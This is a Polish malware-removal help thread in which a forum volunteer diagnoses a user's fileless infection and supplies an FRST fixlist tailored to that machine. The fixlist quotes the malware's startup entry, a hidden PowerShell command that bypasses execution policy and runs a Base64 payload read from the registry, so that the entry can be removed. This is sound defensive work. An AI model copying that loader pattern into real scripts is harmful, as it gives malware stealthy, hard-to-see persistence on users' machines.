Skocz do zawartości

Infekcja rootkit Necros


Rekomendowane odpowiedzi

Witam, ostatnio na pendrive przyniosłem do domu wirusa typu necrus (oczywiście, aby uruchomić GMERA musiałem użyć TDS killera.
Jeżeli chodzi o defekty w systemie to ich nie zauważyłem, jedynie na pendrive tworzony jest skrót do pendrive i formatowanie nie pomaga. Dodatkowo znalazłem dużo plików desktop.ini, w których jest coś takiego

 

[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183

 

Chciałbym pozbyć się tego badziewia i liczę na waszą pomoc.

Poniżej zamieszczam logi.

 

Dodatkowo chciałbym się zapytać, czy antywirus FortiClient jest wystarczający (kiedyś został mi polecony i do dziś go używam) ponieważ nie wykrył mi tego rootkita co mnie martwi. Prosiłbym również o pomoc w oczyszczeniu pendrive ze złośliwego rootkita. Pozdrawiam.

 

GMER.txt Addition.txt FRST.txt Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Raporty FRST nie zostały zrobione wg wskazówek tutaj na forum. Opcje Lista BCD, MD5 sterowników i Pliki z 90 dni nie miały być zaznaczone.

 

 

Cytat

ostatnio na pendrive przyniosłem do domu wirusa typu necrus (oczywiście, aby uruchomić GMERA musiałem użyć TDS killera.

 

Chyba masz na myśli "Necurs". Rootkit ten nie jest przenoszony za pomocą pendrive. Droga jego nabycia to odwiedzenie zainfekowanej strony i instalacja typu "drive-by". A system masz nieodporny, kompletny brak aktualizacji (brakuje pakietu SP1, IE11 i reszty łat = gdzieś około kilkaset pozycji) i stara niebezpieczna wersja Adobe Reader.

 

 

Cytat

Dodatkowo znalazłem dużo plików desktop.ini, w których jest coś takiego

 

[.ShellClassInfo]

LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769

IconResource=%SystemRoot%\system32\imageres.dll,-183

 

To poprawne pliki systemowe. Pliki desktop.ini odpowiadają za nakładanie ikonek i polonizowanych nazw specjalnym folderom w eksploratorze Windows. Przykładowy folder to Desktop (w eksploratorze dzięki desktop.ini widziany jako "Pulpit").

 

 

Cytat

Jeżeli chodzi o defekty w systemie to ich nie zauważyłem, jedynie na pendrive tworzony jest skrót do pendrive i formatowanie nie pomaga.

 

W systemie jest nadal aktywna infekcja typu "bezplikowego". W starcie uruchamia się komenda PowerShell ładująca infekcję z rejestru. Akcje wstępne:

 

1. Odinstaluj Adobe Reader 9.0.1 - Polish.

 

2. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-3667417282-2828754835-1521732128-1003\...\Run: [{0D70B82D-A7E3-4533-9F9A-35D64D29952C}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\QHKTNLCJW').MOQEIFUCUPOPB)));
DeleteKey: HKCU\Software\Classes\QHKTNLCJW
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CyberGhost
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mcagent_exe
S3 EagleXNt; \??\C:\windows\system32\drivers\EagleXNt.sys [X]
S3 mdareDriver_63; \??\C:\Program Files\Fortinet\FortiClient\mdare32_63.sys [X]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\41439825.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\66218137.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\41439825.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\66218137.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"
FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [Brak pliku]
C:\Users\brunon\cd
C:\windows\system32\attrib
C:\windows\system32\cd
CMD: netsh advfirewall reset
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Zrób nowe logi: FRST z opcji Skanuj (Scan) wg ustawień forum (ale już bez Addition i Shortcut) oraz USBFix z opcji Listing przy podpiętym pendrive. Dołącz też plik fixlog.txt oraz logi TDSSKiller:

 

2016-03-17 23:47 - 2016-03-18 00:51 - 00004288 _____ C:\TDSSKiller.3.1.0.9_17.03.2016_23.47.46_log.txt
2016-03-17 23:26 - 2016-03-17 23:46 - 00807482 _____ C:\TDSSKiller.3.1.0.9_17.03.2016_23.26.35_log.txt
2016-03-17 23:24 - 2016-03-17 23:25 - 00009096 _____ C:\TDSSKiller.3.1.0.9_17.03.2016_23.24.13_log.txt

 

Edytowane przez picasso
Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso
Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...